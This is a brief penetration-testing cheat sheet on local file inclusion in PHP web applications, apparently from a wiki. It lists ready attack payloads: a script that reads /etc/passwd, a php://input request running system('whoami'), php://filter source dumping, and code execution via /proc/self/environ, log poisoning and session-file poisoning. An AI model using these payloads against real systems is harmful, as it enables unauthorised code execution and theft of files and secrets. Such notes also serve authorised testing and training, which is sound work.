Comment on page
File Inclusion
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
- use
page=php://input, payload must be in the POST Body (but the request is GET), e.g.<?php echo system('whoami');?>, this is also possible forzip://andphar:// - get source code with filter:
page=php://filter/convert.base64-encode/resource=<filename> page=../../../../../proc/self/environ, if this is accessible we can set the user agent to php code in<?php .. ?>and get it executed, this can also be done for/proc/self/id/<id>and the referrer field (bruteforce the id)- log poisoning, write php into log via error message and request via lfi
- session poisoning, write a malicious session variable and include the session from
/var/lib/phpX/sess_<phpsessid>
Last modified 9mo ago